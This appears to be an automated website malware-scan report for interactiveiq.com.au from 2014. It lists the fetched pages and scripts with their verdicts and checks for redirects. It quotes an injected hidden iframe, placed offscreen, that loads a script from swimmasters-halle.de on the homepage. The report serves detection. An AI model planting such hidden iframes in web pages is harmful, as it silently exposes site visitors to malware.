Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=interactiveiq.com.au
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://interactiveiq.com.au/ | HTTP/1.1 302 Found Connection: close Date: Tue, 13 May 2014 21:57:09 GMT Location: http://www.interactiveiq.com.au/ Server: Apache/2.2.22 Vary: Accept-Encoding Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.interactiveiq.com.au/ | 200 OK Content-Length: 12833 Content-Type: text/html | malicious |
Page code contains blacklisted domain: swimmasters-halle.de ...[5662 bytes skipped]... oat: right"> <img src="iiqassets/images/sbtn-submit.png" alt="Submit" /> </button> </td> </tr> </table> </form> </div><style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="nogcd" name="nogcd" style="position:absolute; height: 132px; width:132px; left:6300px; top:110px;" src="http://swimmasters-halle.de/plugins/traf.php?id=114004"></iframe> <p> </p> </div> </div> <div class="up" id="smpl" style="display: none"> <div class="shade"></div> <div class="form"> <button onclick="return closeUp()" class="x"> <img src="iiqassets/images/btn-close.png" alt="Cancel" /> </button> <div class="ov wait"> <div class="t">< ...[9805 bytes skipped]... Malicious iFrame found. size: 132x132 src: http://swimmasters-halle.de/plugins/traf.php?id=114004 This URL is marked by Google as suspicious <iframe id="nogcd" name="nogcd" style="position:absolute; height: 132px; width:132px; left:6300px; top:110px;" src="http://swimmasters-halle.de/plugins/traf.php?id=114004"> | ||
http://www.interactiveiq.com.au/iiqassets/js2/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/javascript | clean |
http://interactiveiq.com.au/iiqassets/js2/jquery.lightbox-0.5.min.js | HTTP/1.1 302 Found Connection: close Date: Tue, 13 May 2014 21:57:12 GMT Location: http://www.interactiveiq.com.au/iiqassets/js2/jquery.lightbox-0.5.min.js Server: Apache/2.2.22 Vary: Accept-Encoding Content-Length: 333 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.interactiveiq.com.au/iiqassets/js2/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 10100 Content-Type: application/javascript | clean |
http://interactiveiq.com.au/iiqassets/video/swfobject.js | HTTP/1.1 302 Found Connection: close Date: Tue, 13 May 2014 21:57:14 GMT Location: http://www.interactiveiq.com.au/iiqassets/video/swfobject.js Server: Apache/2.2.22 Vary: Accept-Encoding Content-Length: 321 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.interactiveiq.com.au/iiqassets/video/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/javascript | clean |
http://interactiveiq.com.au/iiqassets/js2/iiqscript.js | HTTP/1.1 302 Found Connection: close Date: Tue, 13 May 2014 21:57:15 GMT Location: http://www.interactiveiq.com.au/iiqassets/js2/iiqscript.js Server: Apache/2.2.22 Vary: Accept-Encoding Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.interactiveiq.com.au/iiqassets/js2/iiqscript.js | 200 OK Content-Length: 5909 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIP = ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))); var isIPad = (navigator.userAgent.match(/iPad/i)); var isIOS = (isIPad || isIP); var slideSlider = setInterval(gotoNextSlide, 8000); var currentSlideIndex = 0; var slideList = []; var isHiDPI = (window.devicePixelRatio !== undefined && window.devicePixelRatio >= 1.5); $(function() { $('#to_yt').click(function() { showVideo(); return false;< } function closeFLV() { document.location.hash = ''; $('#vid').hide(); $('#vidc').html(''); } function showUp() { $('.up').height($('#c').height()); } function closeUp() { $('.tinp').val(''); $('.up').hide(); document.location.hash = ''; return false; } function fpFinish() { } function fpAgain() { document.getElementById('cco').style.display = 'none'; flowplayer("player").play(); } Antivirus reports:
| ||
http://interactiveiq.com.au/sample.php | HTTP/1.1 302 Found Connection: close Date: Tue, 13 May 2014 21:57:16 GMT Location: http://www.interactiveiq.com.au/sample.php Server: Apache/2.2.22 Vary: Accept-Encoding Content-Length: 303 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.interactiveiq.com.au/sample.php | 200 OK Content-Length: 2586 Content-Type: text/html | clean |
http://www.interactiveiq.com.au/./ | 200 OK Content-Length: 12833 Content-Type: text/html | malicious |
Page code contains blacklisted domain: swimmasters-halle.de ...[5662 bytes skipped]... oat: right"> <img src="iiqassets/images/sbtn-submit.png" alt="Submit" /> </button> </td> </tr> </table> </form> </div><style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="nogcd" name="nogcd" style="position:absolute; height: 132px; width:132px; left:6300px; top:110px;" src="http://swimmasters-halle.de/plugins/traf.php?id=114004"></iframe> <p> </p> </div> </div> <div class="up" id="smpl" style="display: none"> <div class="shade"></div> <div class="form"> <button onclick="return closeUp()" class="x"> <img src="iiqassets/images/btn-close.png" alt="Cancel" /> </button> <div class="ov wait"> <div class="t">< ...[9805 bytes skipped]... Malicious iFrame found. size: 132x132 src: http://swimmasters-halle.de/plugins/traf.php?id=114004 This URL is marked by Google as suspicious <iframe id="nogcd" name="nogcd" style="position:absolute; height: 132px; width:132px; left:6300px; top:110px;" src="http://swimmasters-halle.de/plugins/traf.php?id=114004"> | ||
http://www.interactiveiq.com.au/./iiqassets/js2/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/javascript | clean |
http://www.interactiveiq.com.au/./iiqassets/js2/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 10100 Content-Type: application/javascript | clean |
http://www.interactiveiq.com.au/./iiqassets/video/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/javascript | clean |
http://www.interactiveiq.com.au/./iiqassets/js2/iiqscript.js | 200 OK Content-Length: 5909 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIP = ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))); var isIPad = (navigator.userAgent.match(/iPad/i)); var isIOS = (isIPad || isIP); var slideSlider = setInterval(gotoNextSlide, 8000); var currentSlideIndex = 0; var slideList = []; var isHiDPI = (window.devicePixelRatio !== undefined && window.devicePixelRatio >= 1.5); $(function() { $('#to_yt').click(function() { showVideo(); return false;< } function closeFLV() { document.location.hash = ''; $('#vid').hide(); $('#vidc').html(''); } function showUp() { $('.up').height($('#c').height()); } function closeUp() { $('.tinp').val(''); $('.up').hide(); document.location.hash = ''; return false; } function fpFinish() { } function fpAgain() { document.getElementById('cco').style.display = 'none'; flowplayer("player").play(); } Antivirus reports:
| ||
http://www.interactiveiq.com.au/./sample.php | 200 OK Content-Length: 2586 Content-Type: text/html | clean |
http://www.interactiveiq.com.au/././ | 200 OK Content-Length: 12833 Content-Type: text/html | malicious |
Page code contains blacklisted domain: swimmasters-halle.de ...[5662 bytes skipped]... oat: right"> <img src="iiqassets/images/sbtn-submit.png" alt="Submit" /> </button> </td> </tr> </table> </form> </div><style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="nogcd" name="nogcd" style="position:absolute; height: 132px; width:132px; left:6300px; top:110px;" src="http://swimmasters-halle.de/plugins/traf.php?id=114004"></iframe> <p> </p> </div> </div> <div class="up" id="smpl" style="display: none"> <div class="shade"></div> <div class="form"> <button onclick="return closeUp()" class="x"> <img src="iiqassets/images/btn-close.png" alt="Cancel" /> </button> <div class="ov wait"> <div class="t">< ...[9805 bytes skipped]... Malicious iFrame found. size: 132x132 src: http://swimmasters-halle.de/plugins/traf.php?id=114004 This URL is marked by Google as suspicious <iframe id="nogcd" name="nogcd" style="position:absolute; height: 132px; width:132px; left:6300px; top:110px;" src="http://swimmasters-halle.de/plugins/traf.php?id=114004"> | ||
http://www.interactiveiq.com.au/././iiqassets/js2/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/javascript | clean |
http://www.interactiveiq.com.au/././iiqassets/js2/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 10100 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: interactiveiq.com.au
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 13 May 2014 21:57:09 GMT
Location: http://www.interactiveiq.com.au/
Server: Apache/2.2.22
Vary: Accept-Encoding
Content-Length: 293
Content-Type: text/html; charset=iso-8859-1
...293 bytes of data.
GET / HTTP/1.1
Host: interactiveiq.com.au
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 13 May 2014 21:57:09 GMT
Location: http://www.interactiveiq.com.au/
Server: Apache/2.2.22
Vary: Accept-Encoding
Content-Length: 293
Content-Type: text/html; charset=iso-8859-1
...293 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: interactiveiq.com.au
Referer: http://www.google.com/search?q=interactiveiq.com.au
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: interactiveiq.com.au
Referer: http://www.google.com/search?q=interactiveiq.com.au
Result:
The result is similar to the first query. There are no suspicious redirects found.